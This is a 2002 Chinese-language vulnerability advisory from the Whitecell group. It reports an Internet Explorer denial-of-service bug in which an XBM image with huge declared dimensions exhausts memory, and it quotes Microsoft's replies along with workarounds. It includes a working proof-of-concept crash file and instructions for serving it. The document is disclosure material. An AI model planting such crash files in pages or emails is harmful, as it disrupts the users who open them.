|
特殊格式的图片文件可使IE拒绝服务
Author : tombkeeper
Email : tombkeeper@whitecell.org
HomePage: http://www.whitecell.org
漏洞类别:Windows,IE,远程 D.o.S.
经测试受影响的系统:
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Server SP2 SRP
- Microsoft Windows 2000 Advance Server SP2 SRP
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0 SP6a
Microsoft Internet Explorer 5.0
- Microsoft Windows 2000 Server SP2 SRP
- Microsoft Windows 2000 Advance Server SP2 SRP
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0 SP6a
未测试的系统:
各平台上的
Microsoft Internet Explorer 5.5
以及
Microsoft Windows 2000 Professional 平台
描述:
将以下代码存为一个文件,无论扩展名是什么,在IE中直接请求或在HTML文件中作为图
片插入引用,都可以正常显示为一幅16x16像素的BMP图片。
#define odo_width 16
#define odo_height 16
static char odo_bits[] = {
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
};
以上是对于远程文件的情况。在本地机器上打开时,文件扩展名必须是不能被浏览器显
示的,不能是 html,txt,gif,jpg 等,可以是 zip,exe,xxx 或其他未知的。可以通过
在HTML文件中作为图片插入引用。
当把 odo_width 和 odo_height的值设为一个极大的数时,IE并不检查文件的实际大小,
而是直接按照 odo_width 和 odo_height的值来申请内存,导致系统资源耗尽,最终系统会
调用DbgBreakPoint杀掉IE的进程。
在资源浏览器中预览或者作为HTML邮件查看也有类似的情况。
测试代码:
将以下代码保存为IEcrash.htm,放到web目录下:
#define odo_width 22222222222222222222
#define odo_height 22222222222222222222
static char odo_bits[] = {
0xFF,
};
在浏览器里输入:http://127.0.0.1/IEcrash.htm
解决方案:
我们已通知了微软,微软承诺在下一个Service Pack里解决此问题。WSS 建议您不要浏
览不受信任的网站,不要用HTML方式察看邮件。在微软给出安全补丁之前暂不要使用IE浏览
器,或者关闭IE对图片的支持。
感谢:
感谢iDuba Security Team的Refdom(refdom@263.net)帮助测试。
附:微软的回复
----- Original Message -----
From: Microsoft Security Response Center
Cc: Microsoft Security Response Center
Sent: Thursday, April 25, 2002 2:58 AM
Subject: RE: A vulnerability of Crashing IE [MSRC 1129LT]
Hi -
Thanks very much for your note. I'll start an investigation of this
issue immediately, and will let you know what I find out. In the
meantime, I've assigned tracking number MSRC 1129LT to this issue. If
you would keep it in the subject line of future notes on the subject, it
would make it easier to get status information for you.
Regards
Secure@microsoft.com
----- Original Message -----
From: Microsoft Security Response Center
Cc: Microsoft Security Response Center
Sent: Tuesday, May 14, 2002 5:35 AM
Subject: RE: A vulnerability of Crashing IE [MSRC 1129LT]
Hi,
I wanted to update you on this issue and let you know where we are in
our testing. The devs found that there is a problem in mshtml but were
unable to run any exploit, only crash IE. They have suggested that a
service pack level fix would be best for this kind of problem for two
reasons. First, and most importantly, service packs get better testing
and so there are less potential problems than with patches. Secondly,
the developers could not run any kind of exploit other than crashing IE.
We are committed to fixing this but would prefer to do it in the next
service pack.
Please let me know if we have missed something or if you have any
feedback you want to share. Thanks again for bringing this issue to our
attention and for providing valuable feedback.
Regards,
secure@microsoft.com
关于我们:
WSS (Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安
全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forum/
|